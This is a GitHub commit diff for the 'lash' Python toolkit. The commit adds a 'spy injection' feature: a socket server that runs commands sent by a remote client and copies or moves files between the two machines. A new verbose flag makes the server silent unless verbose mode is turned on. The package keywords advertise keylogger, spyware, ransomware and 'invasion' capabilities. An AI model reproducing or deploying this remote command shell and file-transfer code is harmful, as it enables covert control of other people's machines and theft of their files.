Skip to content

Commit bef4ebd

Browse files
committed
v1.2.2 Upload
1 parent 83d62c6 commit bef4ebd

File tree

4 files changed

+25
-19
lines changed

4 files changed

+25
-19
lines changed

README.md

Lines changed: 14 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -51,21 +51,31 @@ From version 1.1.0, **configurations** were implemented in the
5151
package, which can be edited manually in */lash/Exportables/config.py*
5252
You can get the config.py path with `lash getconfig` command
5353

54-
**Thanks for ReadMe**
5554

5655

5756
# Release notes
5857

59-
## v1.2.0 - General upgrade
58+
## v1.2.2 - Spy upgrades
59+
60+
* New command: `spy injection`remote commands injection host/client
61+
* Confidentially error fixed on `spy crypt`
62+
63+
## v1.2.1 - Image upgrades
64+
65+
* New command for image: `adjust`
66+
* New options for image: -all, -c
67+
* Load bar implemented on image commands
68+
69+
## v1.2.0 - General upgrades
6070

6171
* Image handling implemented: Flip\Resize
6272
* *Sched* group upgraded: better syntax and display
6373
* *Zip* group upgraded: better syntax, display, no errors and new options
6474
* `spy crypt` upgraded: better syntax and new options (-cl, -ex)
6575
* `autoclick` upgraded: only single and double click option
66-
* `web new` fixed, generting files correctly now
76+
* `web new` fixed, generating files correctly now
6777
* `random upgraded`: Generate random sequences with numbers letters and specials
68-
* New command for `web` : `ghscrape` → scrap a Github profile
78+
* New command for `web` : `ghscrape` → scrap a GitHub profile
6979
* New command for `zip`: `zipview` → view the files inside a zip archive
7080

7181
## v1.1.3.1 - Readme from Pypi page

lash/Exportables/spyTools.py

Lines changed: 0 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -18,9 +18,7 @@ def injection_client_msg():
1818
1919
{"-" * 24} Custom commands {"-" * 24}
2020
[-chdir path] Change the the remote directory
21-
[-start x] Start something on host
2221
[-kill] Kill server all, connections lost
23-
[-cls] Clear the client terminal like cls
2422
[-copy path_host] Copy a file from host to your machine
2523
[-move path_local] Move a file from your machine to host
2624
Move/Copy, gonna affect the local directory (host or client)
@@ -36,10 +34,7 @@ def custom_server_manager(conn, buffer, path, command, command_arg1):
3634
os.chdir(path)
3735
return True
3836
elif command_arg1 == '-copy':
39-
print(command)
40-
print(command_arg1)
4137
file_name = ''.join(command[len(command_arg1):]).strip()
42-
print(file_name)
4338
with open(file_name, 'r') as file:
4439
content = file.read()
4540
conn.send(bytes(file_name, 'utf-8'))

lash/ExtraTools/spy.py

Lines changed: 7 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -89,26 +89,26 @@ def crypt(p, key, dc, ex, cl, v):
8989
print('\nFile(s) encrypted') if v else None
9090

9191

92-
@spy.command(help='Command injection')
92+
@spy.command(help='Remote commands injection host/client')
9393
@click.option('-h', '-host', type=click.STRING, help='Host this machine for remote access, pass the port Ex: -h 8080')
9494
@click.option('-c', '-connect', type=click.STRING, nargs=2, help='Connect to a host by it\' IP, port. Ex: -c 192.168.1.1 8080')
95-
def injection(h, c):
95+
@click.option('-v', is_flag=True, default=False, help='on/off verbose mode for server')
96+
def injection(h, c, v):
9697
buffer = 1024 ** 2
97-
9898
if h:
9999
host = socket.gethostbyname(socket.gethostname())
100100
port = port_verify(h)
101101
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
102102
s.bind((host, port))
103-
print(f'Server online [ host: {host}, port: {port} ] Waiting a connection...')
103+
print(f'Server online [ host: {host}, port: {port} ] Waiting a connection...') if v else None
104104
s.listen()
105105
conn, addr = s.accept()
106106
s.setblocking(False)
107107
with conn:
108-
print(f'Client connected: {addr}')
108+
print(f'Client connected: {addr}') if v else None
109109
while conn:
110110
actual_path = os.getcwd()
111-
print('sending path')
111+
print('Cycle initiated') if v else None
112112
conn.sendall(bytes(actual_path, 'utf-8'))
113113
command = conn.recv(buffer).decode('utf-8').strip()
114114
command_arg1 = command.strip().split()[0]
@@ -123,7 +123,7 @@ def injection(h, c):
123123
s.connect((host, port))
124124
print(injection_client_msg())
125125
while True:
126-
print('receiving path')
126+
print('Cycle initiated') if v else None
127127
path = s.recv(buffer).decode('utf-8')
128128
command = str(input(f'{host}\\{path}> ')).strip()
129129
command_arg1 = command.split()[0]
@@ -132,4 +132,3 @@ def injection(h, c):
132132
print(s.recv(buffer).decode('utf-8'))
133133
else:
134134
print('Error: No option passed')
135-

setup.py

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44

55
setuptools.setup(
66
name='lash',
7-
version='1.2.1',
7+
version='1.2.2',
88
license='GNU GPLv3',
99
author='Kevin Emmanuel',
1010
author_email='kevboyz@pm.me',
@@ -21,11 +21,13 @@
2121
Full ReadMe in `Github <https://github.com/KevBoyz/lash>`_ page.
2222
2323
Documentation on `KevBoyz Docs <https://kevboyz.github.io/KevBoyz-Docs/sub-pages/documentations/lash/index.html>`_.
24+
25+
DocumentationV2 (pt-br) `7562Hall <https://pypi.org/project/lash/1.2.1/>`_.
2426
""",
2527
url='https://github.com/KevBoyz/Lash',
2628
keywords='''
2729
toll tolls toolkit keylogger auto-clicker zip organize files file-handler os random schedule spy spyware
28-
ransomware crypt encrypt system utility images edition cli hacker utilities
30+
ransomware crypt encrypt system utility images edition cli hacker utilities injection invasion
2931
''',
3032
python_requires=">=3.8",
3133
install_requires=[

0 commit comments

Comments
 (0)